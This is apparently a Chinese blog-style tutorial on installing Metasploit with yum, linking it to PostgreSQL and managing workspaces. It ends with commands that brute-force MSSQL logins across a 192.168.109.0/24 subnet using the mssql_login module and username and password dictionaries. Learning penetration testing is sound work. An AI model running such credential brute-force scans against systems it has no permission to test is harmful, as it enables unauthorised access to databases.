一、首先安装依赖
yum groupinstall 'Development Tools'
yum -y install sqlite-devel libxslt-devel libxml2-devel java-1.7.0-openjdk libpcap-devel nano openssl-devel zlib-devel libffi-devel gdbm-devel readline-devel nano wget
yum -y install ruby
yum -y install yaml
yum -y install postgresql
二、安装metasploit
//先下载
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
chmod +x metasploit-latest-linux-x64-installer.run
//然后赋予权限
./metasploit-latest-linux-x64-installer.run
全部同意
然后输入
msfconsole
即可启动
然后查看是否连接数据库
db_status
netstat -tnpl | grep postgres
使用
后面可以查看postgres数据库用户名和密码在database.yml这个配置文件中具体位置可能根据版本不同而不太一样建议搜索一下
使用如下命令:
sudo find / -name database.yml
我的配置文件在/opt/metasploit/apps/pro/ui/config/database.yml
进入metasploit命令行界面:使用命令db_connect 可连接数据库,具体命令:
db_connect username:password@localhost:端口号/数据库名
db_connect msf3:d92e58f9@127.0.0.1:7337
工作区
metasploit为了方便,自动将当前工作区的内容放入数据库
-a 增加工作区,-d删除工作区
不同工作区的内容会分开储存到数据库
工作区介绍完了就是工作区内数据库数据的查看
hosts -h显示帮助
hosts -c显示指定的列
下面命令 将数据导出为csv
hosts -S / -o /lib/smb.csv
爆破MSSQL密码
use auxiliary/scanner/mssql/mssql_login
show options
set RHOSTS 192.168.109.0/24
set THREADS 64
run
使用字典表
use auxiliary/scanner/mssql/mssql_login
show options
set USER_FILE /opt/name.txt
set PASS_FILE /opt/pass.txt
run
如果能查到用户名密码就会显示出来,字典表可以到这个网站找渗透测试网站